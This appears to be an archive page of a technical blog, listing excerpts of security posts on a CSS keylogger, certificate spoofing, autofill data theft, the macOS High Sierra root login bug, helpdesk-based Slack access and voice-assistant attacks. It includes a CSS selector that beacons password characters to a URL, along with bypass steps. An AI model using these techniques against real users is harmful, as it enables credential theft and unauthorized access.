A rather geeky/technical weblog, est. 2001, by Bramus
Leveraging CSS attribute selectors it – in theory – is possible to write a keylogger in pure CSS. The selector below for example targets all input[type=”password”] elements whose last character is an a: input[type=”password”][value$=”a”] { background-image: url(“http://localhost:3000/a”); } The theory goes that whenever a user presses the a character inside an input[type=”password”], a request to …
Continue reading “CSS Keylogger (and why you shouldn’t worry about it)”
https://stripe.ian.sh/ is an interesting site by Ian Carroll. See it? Take a closer look at the certificate. Yes, that’s one for “Stripe, Inc” … but, that’s not “Stripe, Inc” is it? This site uses an EV certificate for “Stripe, Inc”, that was legitimately issued by Comodo. However, when you hear “Stripe, Inc”, you are probably …
There’s a security best practice where sign ins aren’t supposed to say “password is incorrect”. Instead they’re supposed to say the “username or password is incorrect”. This “best practice” is bullshit. […] You gain no security, yet your customers lose clarity. At first I raised my eyebrow when reading this, yet it became clear rather …
Continue reading ““Username or Password Incorrect” is Bullshit”
👋 This post also got published on Medium. If you like it, please give it some love a clap over there. Late 2016, Stoyan Stefanov published “Oversharing with the browser’s autofill”. It’s an article on stealing personal data using the browsers their form autofill feature. The attack works by leveraging abusing the fact that autocompletion …
This tweet is currently making rounds on Twitter: You can access it via System Preferences>Users & Groups>Click the lock to make changes. Then use "root" with no password. And try it for several times. Result is unbelievable! — Lemi Orhan Ergin (@lemiorhan) November 28, 2017 And yes, that actually works: enter root as a username, …
Continue reading “Login with root and no password on any mac running macOS High Sierra”
Since early October it’s possible to enable Two Factor Authentication with your NPM account. 2FA is another layer of defense for your account, preventing third parties from altering your code even if they steal or guess your credentials. This is one of the easiest and most important ways to ensure that only you can access …
Continue reading “TIP: Enable Two Factor Authentication (2FA) with your NPM account”
Clever way, unearthed by Inti de Ceukelaire, to getting access to private communications channels (such as Slack) by leveraging the create-by-email feature of issue trackers/the helpdesk of a company. First target of Init was Gitlab’s Slack channel: Anyone with a valid @gitlab.com e-mail address can join their Slack team. At the same time, GitLab offers …
Continue reading “Ticket Trick: Hacking companies through their helpdesk”
About a year ago it came to my attention that voice assistants such as Siri can lead to easily exploitable security issues. As voice assistants are not aware who is talking to them, it doesn’t matter if it’s you or your neighbour shouting “Unlock the door” at ‘m … Now a team from Zhejiang University …
Continue reading “DolphinAttack: Hacking Voice Assistants with Inaudible Voice Commands”
We’re all doomed: In this paper, we propose a WiFi signal based keystroke recognition system called WiKey. WiKey consists of two Commercial Off-The-Shelf (COTS) WiFi devices, a sender (such as a router) and a receiver (such as a laptop). The sender continuously emits signals and the receiver continuously receives signals. When a human subject types …
Turns out one single right-to-left character in a URL can make the omnibox (Address Bar) freak out, and render it wrongly: Placing neutral characters such as “/”, “ا” in filepath causes the URL to be flipped and displayed from Right To Left. In order for the URL to be spoofed the URL must begin with …
Continue reading “Google Chrome, Firefox Address Bar Spoofing Vulnerability”